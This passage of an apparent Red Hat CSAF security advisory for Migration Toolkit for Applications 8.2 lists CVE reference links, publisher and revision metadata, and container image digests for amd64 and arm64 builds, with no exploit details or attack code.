| https://access.redhat.com/security/cve/CVE-2026-44843 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2481695 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-44843 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-44843 | external |
| https://github.com/langchain-ai/langchain/securit… | external |
| https://access.redhat.com/security/cve/CVE-2026-45292 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2482785 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-45292 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-45292 | external |
| https://github.com/open-telemetry/opentelemetry-j… | external |
| https://github.com/open-telemetry/opentelemetry-j… | external |
| https://github.com/open-telemetry/opentelemetry-j… | external |
| https://github.com/open-telemetry/opentelemetry-j… | external |
| https://access.redhat.com/security/cve/CVE-2026-48526 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2482734 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-48526 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-48526 | external |
| https://github.com/jpadilla/pyjwt/security/adviso… | external |
| https://access.redhat.com/security/cve/CVE-2026-48710 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2481742 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-48710 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-48710 | external |
| https://badhost.org | external |
| https://github.com/Kludex/starlette/commit/764dab… | external |
| https://github.com/Kludex/starlette/security/advi… | external |
| https://github.com/pypa/advisory-database/tree/ma… | external |
| https://ostif.org/disclosing-the-badhost-vulnerab… | external |
| https://www.secwest.net/starlette | external |
| https://www.x41-dsec.de/lab/advisories/x41-2026-0… | external |
| https://access.redhat.com/security/cve/CVE-2026-48746 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2491581 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-48746 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-48746 | external |
| https://github.com/vllm-project/vllm/pull/43426 | external |
| https://github.com/vllm-project/vllm/security/adv… | external |
| https://x41-dsec.de/lab/advisories/x41-2026-002-s… | external |
| https://access.redhat.com/security/cve/CVE-2026-48990 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2490168 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-48990 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-48990 | external |
| https://github.com/authlib/joserfc/releases/tag/1.6.7 | external |
| https://github.com/authlib/joserfc/security/advis… | external |
| https://access.redhat.com/security/cve/CVE-2026-54283 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2491440 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-54283 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-54283 | external |
| https://github.com/Kludex/starlette/security/advi… | external |
| https://access.redhat.com/security/cve/CVE-2026-59939 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2498212 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-59939 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-59939 | external |
| https://github.com/httplib2/httplib2/commit/87581… | external |
| https://github.com/httplib2/httplib2/releases/tag… | external |
| https://github.com/httplib2/httplib2/security/adv… | external |
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Critical"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "A new version of Migration Toolkit for Applications (MTA) is now available.",
"title": "Topic"
},
{
"category": "general",
"text": "Migration Toolkit for Applications (MTA) accelerates large-scale application modernization efforts across hybrid cloud environments on Red Hat OpenShift. \nThis solution provides insight throughout the adoption process, at both the portfolio and application levels: inventory, assess, analyze, and manage\napplications for faster migration to OpenShift via the user interface.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:43038",
"url": "https://access.redhat.com/errata/RHSA-2026:43038"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-13676",
"url": "https://access.redhat.com/security/cve/CVE-2026-13676"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25681",
"url": "https://access.redhat.com/security/cve/CVE-2026-25681"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-27136",
"url": "https://access.redhat.com/security/cve/CVE-2026-27136"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-28684",
"url": "https://access.redhat.com/security/cve/CVE-2026-28684"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-33079",
"url": "https://access.redhat.com/security/cve/CVE-2026-33079"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-33811",
"url": "https://access.redhat.com/security/cve/CVE-2026-33811"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-34993",
"url": "https://access.redhat.com/security/cve/CVE-2026-34993"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-35397",
"url": "https://access.redhat.com/security/cve/CVE-2026-35397"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-39820",
"url": "https://access.redhat.com/security/cve/CVE-2026-39820"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-39821",
"url": "https://access.redhat.com/security/cve/CVE-2026-39821"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-40110",
"url": "https://access.redhat.com/security/cve/CVE-2026-40110"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-40171",
"url": "https://access.redhat.com/security/cve/CVE-2026-40171"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-42266",
"url": "https://access.redhat.com/security/cve/CVE-2026-42266"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-42499",
"url": "https://access.redhat.com/security/cve/CVE-2026-42499"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-42504",
"url": "https://access.redhat.com/security/cve/CVE-2026-42504"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-42557",
"url": "https://access.redhat.com/security/cve/CVE-2026-42557"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-42561",
"url": "https://access.redhat.com/security/cve/CVE-2026-42561"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-44431",
"url": "https://access.redhat.com/security/cve/CVE-2026-44431"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-44432",
"url": "https://access.redhat.com/security/cve/CVE-2026-44432"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-44727",
"url": "https://access.redhat.com/security/cve/CVE-2026-44727"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-44843",
"url": "https://access.redhat.com/security/cve/CVE-2026-44843"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-45292",
"url": "https://access.redhat.com/security/cve/CVE-2026-45292"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-48526",
"url": "https://access.redhat.com/security/cve/CVE-2026-48526"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-48710",
"url": "https://access.redhat.com/security/cve/CVE-2026-48710"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-48746",
"url": "https://access.redhat.com/security/cve/CVE-2026-48746"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-48990",
"url": "https://access.redhat.com/security/cve/CVE-2026-48990"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-5422",
"url": "https://access.redhat.com/security/cve/CVE-2026-5422"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-54283",
"url": "https://access.redhat.com/security/cve/CVE-2026-54283"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-59939",
"url": "https://access.redhat.com/security/cve/CVE-2026-59939"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-6322",
"url": "https://access.redhat.com/security/cve/CVE-2026-6322"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "external",
"summary": "https://developers.redhat.com/products/mta/overview",
"url": "https://developers.redhat.com/products/mta/overview"
},
{
"category": "external",
"summary": "https://docs.redhat.com/en/documentation/migration_toolkit_for_applications/",
"url": "https://docs.redhat.com/en/documentation/migration_toolkit_for_applications/"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_43038.json"
}
],
"title": "Red Hat Security Advisory: Migration Toolkit for Applications",
"tracking": {
"current_release_date": "2026-08-05T02:30:28+00:00",
"generator": {
"date": "2026-08-05T02:30:28+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "5.3.8"
}
},
"id": "RHSA-2026:43038",
"initial_release_date": "2026-07-21T22:10:10+00:00",
"revision_history": [
{
"date": "2026-07-21T22:10:10+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-08-01T08:08:43+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-08-05T02:30:28+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Migration Toolkit for Applications 8.2",
"product": {
"name": "Red Hat Migration Toolkit for Applications 8.2",
"product_id": "Red Hat Migration Toolkit for Applications 8.2",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:migration_toolkit_applications:8.2::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat Migration Toolkit for Applications"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"product": {
"name": "registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"product_id": "registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"product_identification_helper": {
"purl": "pkg:oci/mta-analyzer-addon-rhel9@sha256%3A1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53?arch=amd64\u0026repository_url=registry.redhat.io/mta/mta-analyzer-addon-rhel9\u0026tag=1784163267"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"product": {
"name": "registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"product_id": "registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"product_identification_helper": {
"purl": "pkg:oci/mta-cli-rhel9@sha256%3Ad466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7?arch=amd64\u0026repository_url=registry.redhat.io/mta/mta-cli-rhel9\u0026tag=1784211378"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"product": {
"name": "registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"product_id": "registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"product_identification_helper": {
"purl": "pkg:oci/mta-discovery-addon-rhel9@sha256%3Aa72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36?arch=amd64\u0026repository_url=registry.redhat.io/mta/mta-discovery-addon-rhel9\u0026tag=1784056873"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"product": {
"name": "registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"product_id": "registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/mta-dotnet-external-provider-rhel9@sha256%3A794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b?arch=amd64\u0026repository_url=registry.redhat.io/mta/mta-dotnet-external-provider-rhel9\u0026tag=1784056823"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"product": {
"name": "registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"product_id": "registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/mta-go-external-provider-rhel9@sha256%3A8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d?arch=amd64\u0026repository_url=registry.redhat.io/mta/mta-go-external-provider-rhel9\u0026tag=1784162259"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"product": {
"name": "registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"product_id": "registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"product_identification_helper": {
"purl": "pkg:oci/mta-hub-rhel9@sha256%3A2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485?arch=amd64\u0026repository_url=registry.redhat.io/mta/mta-hub-rhel9\u0026tag=1784059743"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"product": {
"name": "registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"product_id": "registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"product_identification_helper": {
"purl": "pkg:oci/mta-java-external-provider-rhel9@sha256%3Ae8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd?arch=amd64\u0026repository_url=registry.redhat.io/mta/mta-java-external-provider-rhel9\u0026tag=1784210217"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"product": {
"name": "registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"product_id": "registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"product_identification_helper": {
"purl": "pkg:oci/mta-nodejs-external-provider-rhel9@sha256%3A12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6?arch=amd64\u0026repository_url=registry.redhat.io/mta/mta-nodejs-external-provider-rhel9\u0026tag=1784162266"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"product": {
"name": "registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"product_id": "registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"product_identification_helper": {
"purl": "pkg:oci/mta-rhel9-operator@sha256%3A3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0?arch=amd64\u0026repository_url=registry.redhat.io/mta/mta-rhel9-operator\u0026tag=1784219586"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"product": {
"name": "registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"product_id": "registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"product_identification_helper": {
"purl": "pkg:oci/mta-operator-bundle@sha256%3A94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf?arch=amd64\u0026repository_url=registry.redhat.io/mta/mta-operator-bundle\u0026tag=1784220119"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"product": {
"name": "registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"product_id": "registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"product_identification_helper": {
"purl": "pkg:oci/mta-platform-addon-rhel9@sha256%3Af421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf?arch=amd64\u0026repository_url=registry.redhat.io/mta/mta-platform-addon-rhel9\u0026tag=1784059659"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"product": {
"name": "registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"product_id": "registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/mta-python-external-provider-rhel9@sha256%3A4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1?arch=amd64\u0026repository_url=registry.redhat.io/mta/mta-python-external-provider-rhel9\u0026tag=1784162359"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"product": {
"name": "registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"product_id": "registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"product_identification_helper": {
"purl": "pkg:oci/mta-solution-server-rhel9@sha256%3A21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23?arch=amd64\u0026repository_url=registry.redhat.io/mta/mta-solution-server-rhel9\u0026tag=1784109883"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"product": {
"name": "registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"product_id": "registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/mta-ui-rhel9@sha256%3Aa77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1?arch=amd64\u0026repository_url=registry.redhat.io/mta/mta-ui-rhel9\u0026tag=1783962515"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"product": {
"name": "registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"product_id": "registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"product_identification_helper": {
"purl": "pkg:oci/mta-analyzer-addon-rhel9@sha256%3A907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6?arch=arm64\u0026repository_url=registry.redhat.io/mta/mta-analyzer-addon-rhel9\u0026tag=1784163267"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"product": {
"name": "registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"product_id": "registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"product_identification_helper": {
"purl": "pkg:oci/mta-cli-rhel9@sha256%3Aecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab?arch=arm64\u0026repository_url=registry.redhat.io/mta/mta-cli-rhel9\u0026tag=1784211378"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"product": {
"name": "registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"product_id": "registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"product_identification_helper": {
"purl": "pkg:oci/mta-discovery-addon-rhel9@sha256%3A7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace?arch=arm64\u0026repository_url=registry.redhat.io/mta/mta-discovery-addon-rhel9\u0026tag=1784056873"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"product": {
"name": "registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"product_id": "registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"product_identification_helper": {
"purl": "pkg:oci/mta-dotnet-external-provider-rhel9@sha256%3Ab5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465?arch=arm64\u0026repository_url=registry.redhat.io/mta/mta-dotnet-external-provider-rhel9\u0026tag=1784056823"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"product": {
"name": "registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"product_id": "registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/mta-go-external-provider-rhel9@sha256%3A8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b?arch=arm64\u0026repository_url=registry.redhat.io/mta/mta-go-external-provider-rhel9\u0026tag=1784162259"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"product": {
"name": "registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"product_id": "registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"product_identification_helper": {
"purl": "pkg:oci/mta-hub-rhel9@sha256%3A0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415?arch=arm64\u0026repository_url=registry.redhat.io/mta/mta-hub-rhel9\u0026tag=1784059743"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"product": {
"name": "registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"product_id": "registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"product_identification_helper": {
"purl": "pkg:oci/mta-java-external-provider-rhel9@sha256%3A60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2?arch=arm64\u0026repository_url=registry.redhat.io/mta/mta-java-external-provider-rhel9\u0026tag=1784210217"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"product": {
"name": "registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"product_id": "registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"product_identification_helper": {
"purl": "pkg:oci/mta-nodejs-external-provider-rhel9@sha256%3Aa89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844?arch=arm64\u0026repository_url=registry.redhat.io/mta/mta-nodejs-external-provider-rhel9\u0026tag=1784162266"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"product": {
"name": "registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"product_id": "registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"product_identification_helper": {
"purl": "pkg:oci/mta-rhel9-operator@sha256%3A957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a?arch=arm64\u0026repository_url=registry.redhat.io/mta/mta-rhel9-operator\u0026tag=1784219586"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"product": {
"name": "registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"product_id": "registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"product_identification_helper": {
